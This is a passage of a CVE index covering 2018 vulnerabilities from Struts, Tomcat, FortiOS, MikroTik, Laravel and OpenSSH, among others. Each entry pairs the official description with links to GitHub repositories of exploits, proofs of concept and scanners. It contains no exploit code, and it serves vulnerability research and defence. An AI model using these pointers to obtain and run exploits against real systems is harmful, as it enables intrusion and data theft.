Stored XSS in YOOtheme Pagekit 1.0.13 and earlier allows a user to upload malicious code via the picture upload feature. A user with elevated privileges could upload a photo to the system in an SVG format. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/poc.svg" that will point to http://localhost/pagekit/storage/poc.svg. When a user comes along to click that link, it will trigger a XSS attack.
- [GeunSam2/CVE-2018-11564](https://github.com/GeunSam2/CVE-2018-11564)
### CVE-2018-11631 (2018-05-31)
Rondaful M1 Wristband Smart Band 1 devices allow remote attackers to send an arbitrary number of call or SMS notifications via crafted Bluetooth Low Energy (BLE) traffic.
- [ColeShelly/bandexploit](https://github.com/ColeShelly/bandexploit)
### CVE-2018-11686 (2019-07-03)
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
- [mpgn/CVE-2018-11686](https://github.com/mpgn/CVE-2018-11686)
### CVE-2018-11759 (2018-10-31)
The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
- [immunIT/CVE-2018-11759](https://github.com/immunIT/CVE-2018-11759)
- [Jul10l1r4/Identificador-CVE-2018-11759](https://github.com/Jul10l1r4/Identificador-CVE-2018-11759)
- [julioliraup/Identificador-CVE-2018-11759](https://github.com/julioliraup/Identificador-CVE-2018-11759)
### CVE-2018-11761 (2018-09-19)
In Apache Tika 0.1 to 1.18, the XML parsers were not configured to limit entity expansion. They were therefore vulnerable to an entity expansion vulnerability which can lead to a denial of service attack.
- [brianwrf/CVE-2018-11761](https://github.com/brianwrf/CVE-2018-11761)
### CVE-2018-11770 (2018-08-13)
From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.
- [ivanitlearning/CVE-2018-11770](https://github.com/ivanitlearning/CVE-2018-11770)
### CVE-2018-11776 (2018-08-22)
Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.
- [xfox64x/CVE-2018-11776](https://github.com/xfox64x/CVE-2018-11776)
- [jiguangsdf/CVE-2018-11776](https://github.com/jiguangsdf/CVE-2018-11776)
- [hook-s3c/CVE-2018-11776-Python-PoC](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC)
- [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776)
- [bhdresh/CVE-2018-11776](https://github.com/bhdresh/CVE-2018-11776)
- [knqyf263/CVE-2018-11776](https://github.com/knqyf263/CVE-2018-11776)
- [Ekultek/Strutter](https://github.com/Ekultek/Strutter)
- [tuxotron/cve-2018-11776-docker](https://github.com/tuxotron/cve-2018-11776-docker)
- [brianwrf/S2-057-CVE-2018-11776](https://github.com/brianwrf/S2-057-CVE-2018-11776)
- [649/Apache-Struts-Shodan-Exploit](https://github.com/649/Apache-Struts-Shodan-Exploit)
- [jezzus/CVE-2018-11776-Python-PoC](https://github.com/jezzus/CVE-2018-11776-Python-PoC)
- [cved-sources/cve-2018-11776](https://github.com/cved-sources/cve-2018-11776)
- [OzNetNerd/apche-struts-vuln-demo-cve-2018-11776](https://github.com/OzNetNerd/apche-struts-vuln-demo-cve-2018-11776)
- [cucadili/CVE-2018-11776](https://github.com/cucadili/CVE-2018-11776)
- [ArunBhandarii/Apache-Struts-0Day-Exploit](https://github.com/ArunBhandarii/Apache-Struts-0Day-Exploit)
- [freshdemo/ApacheStruts-CVE-2018-11776](https://github.com/freshdemo/ApacheStruts-CVE-2018-11776)
- [sonpt-afk/CVE-2018-11776-FIS](https://github.com/sonpt-afk/CVE-2018-11776-FIS)
### CVE-2018-11784 (2018-10-04)
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.
- [Cappricio-Securities/CVE-2018-11784](https://github.com/Cappricio-Securities/CVE-2018-11784)
### CVE-2018-11788 (2019-01-07)
Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases.
- [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
### CVE-2018-11790 (2019-01-31)
When loading a document with Apache Open Office 4.1.5 and earlier with smaller end line termination than the operating system uses, the defect occurs. In this case OpenOffice runs into an Arithmetic Overflow at a string length calculation.
- [anmuxi-bai/CVE-2018-11790](https://github.com/anmuxi-bai/CVE-2018-11790)
### CVE-2018-12018 (2018-07-05)
The GetBlockHeadersMsg handler in the LES protocol implementation in Go Ethereum (aka geth) before 1.8.11 may lead to an access violation because of an integer signedness error for the array index, which allows attackers to launch a Denial of Service attack by sending a packet with a -1 query.Skip value. The vulnerable remote node would be crashed by such an attack immediately, aka the EPoD (Ethereum Packet of Death) issue.
- [k3v142/CVE-2018-12018](https://github.com/k3v142/CVE-2018-12018)
### CVE-2018-12031 (2018-06-07)
Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via server/node_upgrade_srv.js directory traversal with the firmware parameter in a downloadFirmware action.
- [EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion](https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion)
### CVE-2018-12038 (2018-11-20)
An issue was discovered on Samsung 840 EVO devices. Vendor-specific commands may allow access to the disk-encryption key.
- [gdraperi/remote-bitlocker-encryption-report](https://github.com/gdraperi/remote-bitlocker-encryption-report)
### CVE-2018-12086 (2018-09-14)
Buffer overflow in OPC UA applications allows remote attackers to trigger a stack overflow with carefully structured requests.
- [kevinherron/stack-overflow-poc](https://github.com/kevinherron/stack-overflow-poc)
### CVE-2018-12326 (2018-06-17)
Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source.
- [spasm5/CVE-2018-12326](https://github.com/spasm5/CVE-2018-12326)
### CVE-2018-12386 (2018-10-18)
A vulnerability in register allocation in JavaScript can lead to type confusion, allowing for an arbitrary read and write. This leads to remote code execution inside the sandboxed content process when triggered. This vulnerability affects Firefox ESR < 60.2.2 and Firefox < 62.0.3.
- [Hydra3evil/cve-2018-12386](https://github.com/Hydra3evil/cve-2018-12386)
- [0xLyte/cve-2018-12386](https://github.com/0xLyte/cve-2018-12386)
### CVE-2018-12418 (2018-06-14)
Archive.java in Junrar before 1.0.1, as used in Apache Tika and other products, is affected by a denial of service vulnerability due to an infinite loop when handling corrupt RAR files.
- [tafamace/CVE-2018-12418](https://github.com/tafamace/CVE-2018-12418)
### CVE-2018-12421 (2018-06-14)
LTB (aka LDAP Tool Box) Self Service Password before 1.3 allows a change to a user password (without knowing the old password) via a crafted POST request, because the ldap_bind return value is mishandled and the PHP data type is not constrained to be a string.
- [reversebrain/CVE-2018-12421](https://github.com/reversebrain/CVE-2018-12421)
### CVE-2018-12463 (2018-07-12)
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
- [alt3kx/CVE-2018-12463](https://github.com/alt3kx/CVE-2018-12463)
### CVE-2018-12533 (2018-06-18)
JBoss RichFaces 3.1.0 through 3.3.4 allows unauthenticated remote attackers to inject expression language (EL) expressions and execute arbitrary Java code via a /DATA/ substring in a path with an org.richfaces.renderkit.html.Paint2DResource$ImageData object, aka RF-14310.
- [llamaonsecurity/CVE-2018-12533](https://github.com/llamaonsecurity/CVE-2018-12533)
- [Pastea/CVE-2018-12533](https://github.com/Pastea/CVE-2018-12533)
### CVE-2018-12537 (2018-08-14)
In Eclipse Vert.x version 3.0 to 3.5.1, the HttpServer response headers and HttpClient request headers do not filter carriage return and line feed characters from the header value. This allow unfiltered values to inject a new header in the client request or server response.
- [tafamace/CVE-2018-12537](https://github.com/tafamace/CVE-2018-12537)
### CVE-2018-12540 (2018-07-12)
In version from 3.0.0 to 3.5.2 of Eclipse Vert.x, the CSRFHandler do not assert that the XSRF Cookie matches the returned XSRF header/form parameter. This allows replay attacks with previously issued tokens which are not expired yet.
- [bernard-wagner/vertx-web-xsrf](https://github.com/bernard-wagner/vertx-web-xsrf)
- [tafamace/CVE-2018-12540](https://github.com/tafamace/CVE-2018-12540)
### CVE-2018-12596 (2018-10-10)
Episerver Ektron CMS before 9.0 SP3 Site CU 31, 9.1 before SP3 Site CU 45, or 9.2 before SP2 Site CU 22 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).
- [alt3kx/CVE-2018-12596](https://github.com/alt3kx/CVE-2018-12596)
### CVE-2018-12597
- [alt3kx/CVE-2018-12597](https://github.com/alt3kx/CVE-2018-12597)
### CVE-2018-12598
- [alt3kx/CVE-2018-12598](https://github.com/alt3kx/CVE-2018-12598)
### CVE-2018-12613 (2018-06-21)
An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
- [0x00-0x00/CVE-2018-12613](https://github.com/0x00-0x00/CVE-2018-12613)
- [ivanitlearning/CVE-2018-12613](https://github.com/ivanitlearning/CVE-2018-12613)
- [eastmountyxz/CVE-2018-12613-phpMyAdmin](https://github.com/eastmountyxz/CVE-2018-12613-phpMyAdmin)
### CVE-2018-12636 (2018-06-22)
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.
- [nth347/CVE-2018-12636_exploit](https://github.com/nth347/CVE-2018-12636_exploit)
### CVE-2018-12798 (2018-07-20)
Adobe Acrobat and Reader 2018.011.20040 and earlier, 2017.011.30080 and earlier, and 2015.006.30418 and earlier versions have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.
- [sharmasandeepkr/cve-2018-12798](https://github.com/sharmasandeepkr/cve-2018-12798)
### CVE-2018-12895 (2018-06-26)
WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges.
- [bloom-ux/cve-2018-12895-hotfix](https://github.com/bloom-ux/cve-2018-12895-hotfix)
### CVE-2018-13257 (2019-11-18)
The bb-auth-provider-cas authentication module within Blackboard Learn 2018-07-02 is susceptible to HTTP host header spoofing during Central Authentication Service (CAS) service ticket validation, enabling a phishing attack from the CAS server login page.
- [gluxon/CVE-2018-13257](https://github.com/gluxon/CVE-2018-13257)
### CVE-2018-13341 (2018-08-10)
Crestron TSW-X60 all versions prior to 2.001.0037.001 and MC3 all versions prior to 1.502.0047.00, The passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges.
- [axcheron/crestron_getsudopwd](https://github.com/axcheron/crestron_getsudopwd)
- [RajChowdhury240/CVE-2018-13341](https://github.com/RajChowdhury240/CVE-2018-13341)
### CVE-2018-13379 (2019-06-04)
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
- [milo2012/CVE-2018-13379](https://github.com/milo2012/CVE-2018-13379)
- [jpiechowka/at-doom-fortigate](https://github.com/jpiechowka/at-doom-fortigate)
- [0xHunter/FortiOS-Credentials-Disclosure](https://github.com/0xHunter/FortiOS-Credentials-Disclosure)
- [Blazz3/cve2018-13379-nmap-script](https://github.com/Blazz3/cve2018-13379-nmap-script)
- [yukar1z0e/CVE-2018-13379](https://github.com/yukar1z0e/CVE-2018-13379)
- [pwn3z/CVE-2018-13379-FortinetVPN](https://github.com/pwn3z/CVE-2018-13379-FortinetVPN)
- [k4nfr3/CVE-2018-13379-Fortinet](https://github.com/k4nfr3/CVE-2018-13379-Fortinet)
- [Zeop-CyberSec/fortios_vpnssl_traversal_leak](https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak)
- [B1anda0/CVE-2018-13379](https://github.com/B1anda0/CVE-2018-13379)
- [nivdolgin/CVE-2018-13379](https://github.com/nivdolgin/CVE-2018-13379)
### CVE-2018-13382 (2019-06-04)
An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests
- [milo2012/CVE-2018-13382](https://github.com/milo2012/CVE-2018-13382)
- [tumikoto/Exploit-FortinetMagicBackdoor](https://github.com/tumikoto/Exploit-FortinetMagicBackdoor)
### CVE-2018-13410 (2018-07-06)
Info-ZIP Zip 3.0, when the -T and -TT command-line options are used, allows attackers to cause a denial of service (invalid free and application crash) or possibly have unspecified other impact because of an off-by-one error. NOTE: it is unclear whether there are realistic scenarios in which an untrusted party controls the -TT value, given that the entire purpose of -TT is execution of arbitrary commands
- [shinecome/zip](https://github.com/shinecome/zip)
### CVE-2018-13784 (2018-07-09)
PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
- [ambionics/prestashop-exploits](https://github.com/ambionics/prestashop-exploits)
### CVE-2018-13797 (2018-07-10)
The macaddress module before 0.2.9 for Node.js is prone to an arbitrary command injection flaw, due to allowing unsanitized input to an exec (rather than execFile) call.
- [dsp-testing/CVE-2018-13797](https://github.com/dsp-testing/CVE-2018-13797)
### CVE-2018-13864 (2018-07-17)
A directory traversal vulnerability has been found in the Assets controller in Play Framework 2.6.12 through 2.6.15 (fixed in 2.6.16) when running on Windows. It allows a remote attacker to download arbitrary files from the target server via specially crafted HTTP requests.
- [tafamace/CVE-2018-13864](https://github.com/tafamace/CVE-2018-13864)
### CVE-2018-14009 (2018-07-12)
Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689.
- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009)
### CVE-2018-14040 (2018-07-13)
In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute.
- [Snorlyd/https-nj.gov---CVE-2018-14040](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14040)
### CVE-2018-14041 (2018-07-13)
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy.
- [Snorlyd/https-nj.gov---CVE-2018-14041](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14041)
### CVE-2018-14042 (2018-07-13)
In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip.
- [Snorlyd/https-nj.gov---CVE-2018-14042](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14042)
### CVE-2018-14083 (2018-07-25)
LICA miniCMTS E8K(u/i/...) devices allow remote attackers to obtain sensitive information via a direct POST request for the inc/user.ini file, leading to discovery of a password hash.
- [pudding2/CVE-2018-14083](https://github.com/pudding2/CVE-2018-14083)
### CVE-2018-14442 (2018-07-20)
Foxit Reader before 9.2 and PhantomPDF before 9.2 have a Use-After-Free that leads to Remote Code Execution, aka V-88f4smlocs.
- [payatu/CVE-2018-14442](https://github.com/payatu/CVE-2018-14442)
- [sharmasandeepkr/PS-2018-002---CVE-2018-14442](https://github.com/sharmasandeepkr/PS-2018-002---CVE-2018-14442)
### CVE-2018-14463 (2019-10-03)
The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 2, a different vulnerability than CVE-2019-15167.
- [hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463](https://github.com/hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463)
### CVE-2018-14469 (2019-10-03)
The IKEv1 parser in tcpdump before 4.9.3 has a buffer over-read in print-isakmp.c:ikev1_n_print().
- [Trinadh465/external_tcpdump_CVE-2018-14469](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14469)
### CVE-2018-14634 (2018-09-25)
An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable.
- [luan0ap/cve-2018-14634](https://github.com/luan0ap/cve-2018-14634)
### CVE-2018-14665 (2018-10-25)
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
- [jas502n/CVE-2018-14665](https://github.com/jas502n/CVE-2018-14665)
- [bolonobolo/CVE-2018-14665](https://github.com/bolonobolo/CVE-2018-14665)
### CVE-2018-14667 (2018-11-06)
The RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData.
- [nareshmail/cve-2018-14667](https://github.com/nareshmail/cve-2018-14667)
- [zeroto01/CVE-2018-14667](https://github.com/zeroto01/CVE-2018-14667)
- [r00t4dm/CVE-2018-14667](https://github.com/r00t4dm/CVE-2018-14667)
- [syriusbughunt/CVE-2018-14667](https://github.com/syriusbughunt/CVE-2018-14667)
- [quandqn/cve-2018-14667](https://github.com/quandqn/cve-2018-14667)
- [Venscor/CVE-2018-14667-poc](https://github.com/Venscor/CVE-2018-14667-poc)
### CVE-2018-14699 (2018-12-03)
System command injection in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the "username" URL parameter.
- [RevoCain/CVE-2018-14699](https://github.com/RevoCain/CVE-2018-14699)
### CVE-2018-14714 (2019-05-13)
System command injection in appGet.cgi on ASUS RT-AC3200 version 3.0.0.4.382.50010 allows attackers to execute system commands via the "load_script" URL parameter.
- [tin-z/CVE-2018-14714-POC](https://github.com/tin-z/CVE-2018-14714-POC)
- [sunn1day/CVE-2018-14714-POC](https://github.com/sunn1day/CVE-2018-14714-POC)
- [BTtea/CVE-2018-14714-RCE-exploit](https://github.com/BTtea/CVE-2018-14714-RCE-exploit)
### CVE-2018-14716 (2018-08-06)
A Server Side Template Injection (SSTI) was discovered in the SEOmatic plugin before 3.1.4 for Craft CMS, because requests that don't match any elements incorrectly generate the canonicalUrl, and can lead to execution of Twig code.
- [0xB455/CVE-2018-14716](https://github.com/0xB455/CVE-2018-14716)
### CVE-2018-14729 (2019-05-22)
The database backup feature in upload/source/admincp/admincp_db.php in Discuz! 2.5 and 3.4 allows remote attackers to execute arbitrary PHP code.
- [c0010/CVE-2018-14729](https://github.com/c0010/CVE-2018-14729)
### CVE-2018-14772 (2018-10-16)
Pydio 4.2.1 through 8.2.1 has an authenticated remote code execution vulnerability in which an attacker with administrator access to the web application can execute arbitrary code on the underlying system via Command Injection.
- [killvxk/CVE-2018-14772](https://github.com/killvxk/CVE-2018-14772)
### CVE-2018-14847 (2018-08-02)
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
- [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC)
- [msterusky/WinboxExploit](https://github.com/msterusky/WinboxExploit)
- [syrex1013/MikroRoot](https://github.com/syrex1013/MikroRoot)
- [jas502n/CVE-2018-14847](https://github.com/jas502n/CVE-2018-14847)
- [mahmoodsabir/mikrotik-beast](https://github.com/mahmoodsabir/mikrotik-beast)
- [Tr33-He11/winboxPOC](https://github.com/Tr33-He11/winboxPOC)
- [sinichi449/Python-MikrotikLoginExploit](https://github.com/sinichi449/Python-MikrotikLoginExploit)
- [yukar1z0e/CVE-2018-14847](https://github.com/yukar1z0e/CVE-2018-14847)
- [hacker30468/Mikrotik-router-hack](https://github.com/hacker30468/Mikrotik-router-hack)
- [babyshen/routeros-CVE-2018-14847-bytheway](https://github.com/babyshen/routeros-CVE-2018-14847-bytheway)
- [K3ysTr0K3R/CVE-2018-14847-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-14847-EXPLOIT)
### CVE-2018-14879 (2019-10-03)
The command-line argument parser in tcpdump before 4.9.3 has a buffer overflow in tcpdump.c:get_next_file().
- [Trinadh465/external_tcpdump_CVE-2018-14879](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14879)
### CVE-2018-14880 (2019-10-03)
The OSPFv3 parser in tcpdump before 4.9.3 has a buffer over-read in print-ospf6.c:ospf6_print_lshdr().
- [Trinadh465/external_tcpdump_CVE-2018-14880](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14880)
### CVE-2018-15131 (2019-05-30)
An issue was discovered in Synacor Zimbra Collaboration Suite 8.6.x before 8.6.0 Patch 11, 8.7.x before 8.7.11 Patch 6, 8.8.x before 8.8.8 Patch 9, and 8.8.9 before 8.8.9 Patch 3. Account number enumeration is possible via inconsistent responses for specific types of authentication requests.
- [0x00-0x00/CVE-2018-15131](https://github.com/0x00-0x00/CVE-2018-15131)
### CVE-2018-15133 (2018-08-09)
In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.
- [kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)
- [Bilelxdz/Laravel-CVE-2018-15133](https://github.com/Bilelxdz/Laravel-CVE-2018-15133)
- [Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader](https://github.com/Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader)
- [bukitbarisan/laravel-rce-cve-2018-15133](https://github.com/bukitbarisan/laravel-rce-cve-2018-15133)
- [AlienX2001/better-poc-for-CVE-2018-15133](https://github.com/AlienX2001/better-poc-for-CVE-2018-15133)
- [aljavier/exploit_laravel_cve-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133)
- [pwnedshell/Larascript](https://github.com/pwnedshell/Larascript)
- [AzhariKun/CVE-2018-15133](https://github.com/AzhariKun/CVE-2018-15133)
- [NatteeSetobol/CVE-2018-15133-Lavel-Expliot](https://github.com/NatteeSetobol/CVE-2018-15133-Lavel-Expliot)
- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133)
- [0xSalle/cve-2018-15133](https://github.com/0xSalle/cve-2018-15133)
### CVE-2018-15139 (2018-08-13)
Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.
- [sec-it/exploit-CVE-2018-15139](https://github.com/sec-it/exploit-CVE-2018-15139)
### CVE-2018-15365 (2018-09-28)
A Reflected Cross-Site Scripting (XSS) vulnerability in Trend Micro Deep Discovery Inspector 3.85 and below could allow an attacker to bypass CSRF protection and conduct an attack on vulnerable installations. An attacker must be an authenticated user in order to exploit the vulnerability.
- [nixwizard/CVE-2018-15365](https://github.com/nixwizard/CVE-2018-15365)
### CVE-2018-15473 (2018-08-17)
OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
- [trimstray/massh-enum](https://github.com/trimstray/massh-enum)
- [gbonacini/opensshenum](https://github.com/gbonacini/opensshenum)
- [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit)
- [epi052/cve-2018-15473](https://github.com/epi052/cve-2018-15473)
- [pyperanger/CVE-2018-15473_exploit](https://github.com/pyperanger/CVE-2018-15473_exploit)
- [r3dxpl0it/CVE-2018-15473](https://github.com/r3dxpl0it/CVE-2018-15473)
- [JoeBlackSecurity/SSHUsernameBruter-SSHUB](https://github.com/JoeBlackSecurity/SSHUsernameBruter-SSHUB)
- [cved-sources/cve-2018-15473](https://github.com/cved-sources/cve-2018-15473)
- [LINYIKAI/CVE-2018-15473-exp](https://github.com/LINYIKAI/CVE-2018-15473-exp)
- [trickster1103/-](https://github.com/trickster1103/-)
- [NHPT/SSH-account-enumeration-verification-script](https://github.com/NHPT/SSH-account-enumeration-verification-script)
- [CaioCGH/EP4-redes](https://github.com/CaioCGH/EP4-redes)
- [Moon1705/easy_security](https://github.com/Moon1705/easy_security)
- [An0nYm0u5101/enumpossible](https://github.com/An0nYm0u5101/enumpossible)
- [Wh1t3Fox/cve-2018-15473](https://github.com/Wh1t3Fox/cve-2018-15473)
- [1stPeak/CVE-2018-15473](https://github.com/1stPeak/CVE-2018-15473)
- [coollce/CVE-2018-15473_burte](https://github.com/coollce/CVE-2018-15473_burte)
- [Dirty-Racoon/CVE-2018-15473-py3](https://github.com/Dirty-Racoon/CVE-2018-15473-py3)
- [Sait-Nuri/CVE-2018-15473](https://github.com/Sait-Nuri/CVE-2018-15473)
- [WildfootW/CVE-2018-15473_OpenSSH_7.7](https://github.com/WildfootW/CVE-2018-15473_OpenSSH_7.7)
- [MrDottt/CVE-2018-15473](https://github.com/MrDottt/CVE-2018-15473)
- [66quentin/shodan-CVE-2018-15473](https://github.com/66quentin/shodan-CVE-2018-15473)
- [0xrobiul/CVE-2018-15473](https://github.com/0xrobiul/CVE-2018-15473)
- [philippedixon/CVE-2018-15473](https://github.com/philippedixon/CVE-2018-15473)
- [sergiovks/SSH-User-Enum-Python3-CVE-2018-15473](https://github.com/sergiovks/SSH-User-Enum-Python3-CVE-2018-15473)
- [Anonimo501/ssh_enum_users_CVE-2018-15473](https://github.com/Anonimo501/ssh_enum_users_CVE-2018-15473)
- [mclbn/docker-cve-2018-15473](https://github.com/mclbn/docker-cve-2018-15473)
- [GaboLC98/userenum-CVE-2018-15473](https://github.com/GaboLC98/userenum-CVE-2018-15473)
- [4xolotl/CVE-2018-15473](https://github.com/4xolotl/CVE-2018-15473)
- [NestyF/SSH_Enum_CVE-2018-15473](https://github.com/NestyF/SSH_Enum_CVE-2018-15473)
- [yZ1337/CVE-2018-15473](https://github.com/yZ1337/CVE-2018-15473)
- [MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing](https://github.com/MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing)
### CVE-2018-15499 (2018-08-24)
GEAR Software products that include GEARAspiWDM.sys, 2.2.5.0, allow local users to cause a denial of service (Race Condition and BSoD on Windows) by not checking that user-mode memory is available right before writing to it. A check is only performed at the beginning of a long subroutine.
- [DownWithUp/CVE-2018-15499](https://github.com/DownWithUp/CVE-2018-15499)
### CVE-2018-15686 (2018-10-26)
A vulnerability in unit_deserialize of systemd allows an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This can be used to improperly influence systemd execution and possibly lead to root privilege escalation. Affected releases are systemd versions up to and including 239.
- [hpcprofessional/remediate_cesa_2019_2091](https://github.com/hpcprofessional/remediate_cesa_2019_2091)
### CVE-2018-15708 (2018-11-14)
